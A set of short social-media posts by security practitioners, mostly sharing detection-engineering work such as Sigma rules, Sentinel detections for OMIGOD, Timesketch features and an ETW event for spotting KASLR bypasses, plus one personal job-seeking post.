While this has been used forever to create exploits. It's a very creative way of makng a JIT for architectures that don' allow allocating executable memory. The code can be seen in this commit: github.com/ktemkin/qemu/c… (7/7)

From MISP to ElastAlert via Sigma MISP > Sigmai > Sigma Rule > Sigmac > ElastAlert a simple Bash Script by Wes Lambert MISP (@[email protected]) sigma Elastic github.com/weslambert/mis…

Sigma integration in Timesketch. Today we merged a feature to show Sigma rules in the UI. You also have the ability to search your timelines based on the generated query. #DFIR

research from 2007 that mentions RPC calls used within PetitPotam as potential attack surface "Vista Network Attack Surface Analysis". if there is one there is more.. vx-underground.org/archive/Symant…

Pull request created. Here is the Jupyter notebook under the forked repo : github.com/H1L021/EVTX-AT… Examples: - Top tactics by number of events - Top 10 Tactics by EventIDs and Event Log Providers - Top 30 RelativeTargetName of EventID 5145 by ShareName - Sankey Diagrams

🚨 A few detection opportunities while interacting with local AD hybrid health agent registry keys & Azure AD connect health AD FS services ☁️ 📡SACLs & 🛰️Activity Logs (Directory Activity) FTW 🛡️ #AzureSentinel : github.com/search?q=repo%… 🌎 sigma : github.com/SigmaHQ/sigma/…

Sigma rule by Roberto Rodriguez 🇵🇪 to detect possible #OMIGOD exploitation attempts in auditd logs github.com/SigmaHQ/sigma/…

🚨 Sharing how to deploy a lab environment w/ #AzureSentinel , a few Linux 🐧 VMs and Microsoft Audit Collection Tool (AUOMS) set up 📡to identify & map sources of data to the execution context of OMI! #MSTIC #OMIGOD 😎 This has been very helpful 💥 techcommunity.microsoft.com/t5/azure-senti…

In the last couple of weeks, we've been working 3CORESec 🛡 on a little project we're calling MAL-CL. It aims to collect and document real-world/common "malicious" CLI execs of different tools/utilities. Feedback and contributions are much appreciated. github.com/3CORESec/MAL-CL

Considering current situation when my country is running down I see no longer future in Russia for me and my family. I open for any job offers relevant to my LinkedIn profile. Pease DM me, for detailed CV. #NoToWar #НетВойне

.tob mic from my team created a sigma extension for VS Code It's in an early stage but already pretty useful and we've already discussed the cool functions and snippets that he's going to add #Sigma #VSCode marketplace.visualstudio.com/items?itemName…

Check out the #opensource #Kafka #sigma interpreter @mpeacock1964 and I built: github.com/confluentinc/c… Load sigma rules in a topic and the kstreams app will appply them against your streams of observability data in real time! #cybersecurity #cyber inspired by Nate Guagenti socprime

Quick blog post on a new ETW event to monitor "valid" KASLR bypasses through system calls: windows-internals.com/an-end-to-kasl…